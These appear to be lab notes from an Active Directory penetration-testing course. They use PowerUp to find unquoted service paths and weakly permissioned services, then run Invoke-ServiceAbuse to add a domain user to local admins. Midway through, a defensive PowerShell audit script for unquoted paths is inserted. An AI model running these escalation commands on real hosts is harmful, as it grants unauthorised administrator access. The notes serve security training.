Find Unquoted Path
Load PowerUp
. .\PowerUp.ps1
Get-ServiceUnquoted
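A defensive counterpart to the unquoted-path check above, as an added example that is not part of the original notes or of PowerUp: it flags service paths that are unquoted and contain a space, and reports the quoted ImagePath to set instead. The function name Get-ServicePathAudit and the sample services are assumptions constructed for illustration.

```powershell
# Added example: audit service command lines for the unquoted-path condition.
# Sample rows are constructed; on a live host replace $services with:
#   Get-CimInstance Win32_Service | Select-Object Name, PathName

function Get-ServicePathAudit {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$PathName
    )
    $p = $PathName.Trim()
    # Split an unquoted command line into "<path>.exe" and trailing arguments.
    # A path that already starts with a double quote does not match.
    $m = [regex]::Match($p, '^(?<exe>[^"]+?\.exe)(?<args>\s.*)?$', 'IgnoreCase')
    $unquoted = $m.Success -and $m.Groups['exe'].Value.Contains(' ')

    [pscustomobject]@{
        Name      = $Name
        Unquoted  = $unquoted
        # Suggested ImagePath: quote only the executable, keep arguments as-is.
        Suggested = if ($unquoted) {
            '"{0}"{1}' -f $m.Groups['exe'].Value, $m.Groups['args'].Value
        } else { $p }
    }
}

# Constructed sample data (not taken from any real host).
$services = @(
    @{ Name = 'ExampleSvcA'; PathName = 'C:\Program Files\Example App\svc.exe -service' }
    @{ Name = 'ExampleSvcB'; PathName = '"C:\Program Files\Example App\svc.exe" -service' }
    @{ Name = 'ExampleSvcC'; PathName = 'C:\Windows\System32\svchost.exe -k netsvcs' }
)

$services |
    ForEach-Object { Get-ServicePathAudit -Name $_.Name -PathName $_.PathName } |
    Format-Table -AutoSize
```

Only ExampleSvcA is reported as unquoted; the other two are already quoted or contain no space in the executable path.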
Enum Services Whose Binary We Can Modify
Get-ModifiableServiceFile
Enum Services With Weak Permissions
Get-ModifiableService
Example
- We know that the Abyss service has weak permissions, so we can add our current domain user to the local admin group
Invoke-ServiceAbuse -Name "AbyssWebServer" -Username 'dcorp\student648'
Identify a machine where student 648 has local admin access